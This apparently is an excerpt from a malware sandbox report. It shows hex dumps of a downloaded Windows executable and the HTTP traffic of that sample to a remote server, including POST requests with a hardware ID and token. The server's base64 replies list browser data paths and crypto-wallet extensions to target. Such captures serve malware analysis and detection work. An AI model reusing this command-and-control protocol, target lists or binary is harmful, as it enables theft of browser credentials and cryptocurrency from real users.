00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 03 00 14 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 3c 03 00 00 10 00 00 00 3e 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa 39 00 00 00 50 03 00 00 3a 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 fc 67 00 00 00 90 03 00 00 26 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 7a 00 00 00 00 41 02 00 00 00 00 04 00 00 04 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 c4 1e 00 00 10 04 00 00 26 01 00 00 a6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$F'r'r'ru'ru'ru3'r'r's?'ru'ru'ru'rRich'rPELKd>jP@"L}P $P.text&<> `.rdata9P:B@@.datag&\|@.nuzA@.rsrc &@@
Dec 24, 2023 10:44:45.173825026 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d9 ee e9 6b bf 02 00 cc cc cc cc cc cc cc cc cc d9 ee 83 ec 08 dd 1c 24 e8 03 be 02 00 83 c4 08 c3 cc ff 25 Data Ascii: k$%PC%PC%PC%PC%PC%hPC%PC%PC% PC%$PC%(PC%,PC%0PC%4PC%8PC%<PC%@PC%DPC%HPC%LPC%PPC%TPC%XPC%\PC%`PC%dPC%PC
Dec 24, 2023 10:44:45.173863888 CET	1286	IN	Data Raw: 8b 7d 08 3b fb 0f 95 c0 3b c3 75 1c e8 43 1b 00 00 c7 00 16 00 00 00 53 53 53 53 53 e8 b0 1a 00 00 83 c4 14 33 c0 eb 79 33 c0 8b 75 0c 3b f3 0f 95 c0 3b c3 74 d6 33 c0 38 1e 0f 95 c0 3b c3 74 cb e8 fc 4f 00 00 89 45 08 3b c3 75 0d e8 02 1b 00 00 Data Ascii: };;uCSSSSS3y3u;;t38;tOE;u]8u jEPhCQPuVWLEEEO#u"YUj@uu*]UVW}3;uwj_VVVVV8$
Dec 24, 2023 10:44:45.173918962 CET	1286	IN	Data Raw: 00 ff 75 08 ff 15 d4 50 43 00 81 c7 e8 03 00 00 81 ff 60 ea 00 00 77 04 85 c0 74 de 5f 5d c3 8b ff 55 8b ec e8 f9 81 00 00 ff 75 08 e8 20 80 00 00 ff 35 00 90 43 00 e8 18 7a 00 00 68 ff 00 00 00 ff d0 83 c4 0c 5d c3 8b ff 55 8b ec 68 70 52 43 00 Data Ascii: uPC`wt_]Uu 5Czh]UhpRCPCth`RCPPCtu]UuYuPCj]YjbYUVt;ur^]UVu3ut;ur^]UMV3;u\V
Dec 24, 2023 10:44:45.174009085 CET	1286	IN	Data Raw: 84 5d c4 74 06 0f b7 4d c8 eb 03 6a 0a 59 51 50 56 68 00 00 40 00 e8 f1 ad 02 00 89 45 e0 39 75 e4 75 06 50 e8 d8 fd ff ff e8 ff fd ff ff 89 7d fc eb 35 8b 45 ec 8b 08 8b 09 89 4d dc 50 51 e8 9f 82 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d Data Ascii: ]tMjYQPVh@E9uuP}5EMPQYYeEE}uPEE3@eEdyU(HCDC@C<C58C=4Cf`CfTCf0Cf,Cf%(Cf-$CXCE
Dec 24, 2023 10:44:45.174027920 CET	1286	IN	Data Raw: 0f be 80 90 52 43 00 83 e0 0f 33 f6 eb 04 33 f6 33 c0 0f be 84 c1 b0 52 43 00 6a 07 c1 f8 04 59 89 85 94 fd ff ff 3b c1 0f 87 ad 09 00 00 ff 24 85 13 2e 40 00 83 8d e8 fd ff ff ff 89 b5 90 fd ff ff 89 b5 c0 fd ff ff 89 b5 cc fd ff ff 89 b5 d0 fd Data Ascii: RC333RCjY;$.@v tJt6t%HHtWK?3$*u,;
Dec 24, 2023 10:44:45.174091101 CET	1286	IN	Data Raw: ff ff 89 06 c7 85 c0 fd ff ff 01 00 00 00 e9 a6 04 00 00 83 8d f0 fd ff ff 40 c7 85 e0 fd ff ff 0a 00 00 00 8b 8d f0 fd ff ff f7 c1 00 80 00 00 0f 84 a9 01 00 00 8b 07 8b 57 04 83 c7 08 e9 d5 01 00 00 75 11 80 fa 67 75 65 c7 85 e8 fd ff ff 01 00 Data Ascii: @WugueY9~~?]VQYt3GPPSP5C
Dec 24, 2023 10:44:45.174158096 CET	1286	IN	Data Raw: fd ff ff 83 60 70 fd 8b 85 d8 fd ff ff 8b 4d fc 5f 5e 33 cd 5b e8 44 e3 ff ff c9 c3 90 1e 26 40 00 1f 24 40 00 4f 24 40 00 ad 24 40 00 f9 24 40 00 04 25 40 00 4a 25 40 00 78 26 40 00 8b ff 55 8b ec 8b 45 08 a3 64 b6 43 00 5d c3 8b ff 55 8b ec 81 Data Ascii: `pM_^3[D&@$@O$@$@$@%@J%@x&@UEdC]U(C3ESjLjP!(0,ffffffEM0
Dec 24, 2023 10:44:45.174175024 CET	1286	IN	Data Raw: ff 55 08 83 c4 10 89 45 14 3b f3 74 34 3b c3 7c 22 ff 4d e4 78 07 8b 45 e0 88 18 eb 11 8d 45 e0 50 53 e8 57 ed ff ff 59 59 83 f8 ff 74 05 8b 45 14 eb 0e 33 c0 39 5d e4 88 5c 3e ff 0f 9d c0 48 48 5f 5e 5b c9 c3 8b ff 55 8b ec ff 75 14 6a 00 ff 75 Data Ascii: UE;t4;\|"MxEEPSWYYtE39]\>HH_^[Uujuuuh"@}]Uuuuuuh"@}]US39]uSSSSS[Vu;t9]w[0uuuuVh@
Dec 24, 2023 10:44:45.174230099 CET	1286	IN	Data Raw: 0c 81 48 0c 00 80 00 00 59 5d c3 8b 45 0c 83 c0 20 50 ff 15 00 51 43 00 5d c3 8b ff 55 8b ec 8b 45 08 b9 88 91 43 00 3b c1 72 1f 3d e8 93 43 00 77 18 81 60 0c ff 7f ff ff 2b c1 c1 f8 05 83 c0 10 50 e8 92 64 00 00 59 5d c3 83 c0 20 50 ff 15 3c 50 Data Ascii: HY]E PQC]UEC;r=Cw`+PdY] P<PC]UME}`QcdY] P<PC]h 9@d5D$l$l$+SVWC1E3PeuEEEEdMdY__^[]Q
Dec 24, 2023 10:44:45.424880028 CET	1286	IN	Data Raw: ff ff c6 85 61 fe ff ff 00 c6 85 60 fe ff ff 00 c6 85 6a fe ff ff 00 c6 85 53 fe ff ff 00 c6 85 62 fe ff ff 00 c6 85 73 fe ff ff 00 c6 85 6b fe ff ff 01 89 b5 28 fe ff ff 47 0f b6 1f 0f b6 c3 50 e8 1c dd 00 00 59 85 c0 74 1e 8b 85 6c fe ff ff ff Data Ascii: a`jSbsk(GPYtlLkDlN*tpFItLutkO6uG84u(48m3uG82u\dtWitRotMxtHXuAj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49740	77.91.76.36	80	6424	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:48.256021976 CET	413	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDB Host: 77.91.76.36 Content-Length: 215 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 45 32 44 41 34 44 46 32 46 45 31 30 33 30 33 36 31 34 34 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 33 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 2d 2d 0d 0a Data Ascii: ------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="hwid"35E2DA4DF2FE1030361446------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="build"default3------DAEGIIECGHCBFHJKEHDB--
Dec 24, 2023 10:44:49.111762047 CET	339	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 144 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4d 57 4e 69 4e 57 59 30 4e 54 59 32 5a 47 56 6d 5a 6d 59 78 4f 54 4e 6a 5a 6d 45 79 4d 54 6b 32 5a 54 4a 6b 4d 7a 55 78 59 54 59 77 59 7a 56 6d 59 7a 45 79 4e 7a 45 77 4e 44 55 30 4d 44 51 78 59 7a 6c 69 4d 6d 56 69 59 6d 51 33 4e 44 52 6a 4f 57 55 30 4d 7a 59 30 59 6d 51 31 4f 57 5a 68 66 47 52 76 62 6d 56 38 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: MWNiNWY0NTY2ZGVmZmYxOTNjZmEyMTk2ZTJkMzUxYTYwYzVmYzEyNzEwNDU0MDQxYzliMmViYmQ3NDRjOWU0MzY0YmQ1OWZhfGRvbmV8NTE5NTU1NS5maWxlfDF8MXwxfDF8MXwxfDF8MXw=
Dec 24, 2023 10:44:49.215665102 CET	466	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBAAEGDBKKECBGIJEB Host: 77.91.76.36 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 2d 2d 0d 0a Data Ascii: ------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="message"browsers------JJDBAAEGDBKKECBGIJEB--
Dec 24, 2023 10:44:49.614769936 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2
Dec 24, 2023 10:44:49.614789963 CET	430	IN	Data Raw: 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c Data Ascii: hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZ
Dec 24, 2023 10:44:49.667948961 CET	465	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBFHCGCGDAAKFIECFHD Host: 77.91.76.36 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------IDBFHCGCGDAAKFIECFHDContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------IDBFHCGCGDAAKFIECFHDContent-Disposition: form-data; name="message"plugins------IDBFHCGCGDAAKFIECFHD--
Dec 24, 2023 10:44:50.062230110 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5412 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5v